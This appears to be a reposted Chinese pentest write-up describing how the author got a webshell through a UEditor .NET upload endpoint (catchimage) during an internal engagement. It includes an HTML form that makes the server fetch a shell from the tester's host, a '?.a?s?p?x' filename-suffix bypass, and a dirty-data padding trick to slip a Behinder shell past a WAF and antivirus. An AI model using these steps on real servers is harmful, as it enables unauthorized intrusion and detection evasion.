原文首发在先知社区
https://xz.aliyun.com/t/15011
前言
前一段时间和小伙伴在某内网进行渗透测试,目标不给加白,只能进行硬刚了,队友fscan一把梭发现某资产疑似存在Ueditor组件,但初步测试是存在waf和杀软的,无法进行getshell,经过一番折腾最终getshell,文笔粗劣,大佬勿喷。
测试
看这返回内容,Ueditor实锤了,采用公开的POC进行尝试,由于是纯内网无法进行出网,直接本机电脑开启Web服务,充当VPS提供Shell地址
http://xx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx
<form action="http://xxx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx? action=catchimage" enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <input type="submit" value="Submit" /> </form>
从访问日志可以看出是 ?.a?s?p?x 后缀,因为直接采用 ?.aspx 直接被重置
看到这个返回内容 很绝望,所以有了上面后缀的绕过
xxx.gif?.a?s?p?x 来绕过对aspx的检测
本以为到这就可以完全shell,但发现这只是开始,以上测试仅仅是后缀的绕过,开始将gif换成含有shell 的文件,直接被拦截,虽然返回了路径,但实际是访问不到的
开始换各种免杀的webshell,都没落地,由于默认的shell内容比较长,短时间内没办法一个一个测试具体查杀那个函数,用蚁剑生成一个简短的shell,发现成功了, 但流量没绕过。
Bypass
经过一番折腾,采用天蝎的shell+脏数据Bypass,成功getshell (在shell的前后添加多行图片内容,不断的进行复制粘贴,如果只是添加前面或者后面,也没办法bypass)
看看是啥杀软,有点小狠
整理报告,收工 。
原文始发于微信公众号(黑白之道):攻防|记一次Ueditor上传Bypass
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论